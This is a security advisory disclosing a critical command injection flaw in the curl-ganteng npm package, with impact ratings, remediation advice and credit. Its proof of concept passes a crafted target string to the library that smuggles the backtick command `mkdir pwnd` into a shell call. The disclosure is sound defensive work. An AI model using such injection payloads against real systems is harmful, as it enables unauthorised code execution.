Command Injection Vulnerability In Curl-Ganteng - CVE-2021-31896 / CX-2021-4779

Severity

Severity: 9.8 - Critical Severity

Advisory Timeline Summary
All versions of the `curl-ganteng` npm package are vulnerable to command injection through the `curl` function: the target string is handed to a shell unsanitised, so an attacker who controls it can execute arbitrary commands.

Product

All versions of curl-ganteng npm package.

Impact

This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Steps To Reproduce

Run the following PoC:

var curl = require('curl-ganteng')
// The payload closes the single quote around the target, runs `mkdir pwnd`
// as a shell command substitution, then reopens the quote so the rest of
// the command still parses.
curl.curl("google.com' `mkdir pwnd`'").catch((a) => {console.log(a)}).then((a) => {console.log(a)})

Expected Result:

A new directory named `pwnd` is created in the working directory of the Node process, showing that the backtick-wrapped command was executed by the shell.

Remediation

No fixed version has been released. As a workaround, do not pass untrusted input to the vulnerable parameter of `curl`; if the target can come from users, validate it against a strict allow-list (http/https URL only, no shell metacharacters) before calling the library.

Properties

Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

User Interaction: None

Scope: Unchanged

Confidentiality: High

Integrity: High

Availability: High

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. curl-ganteng npm package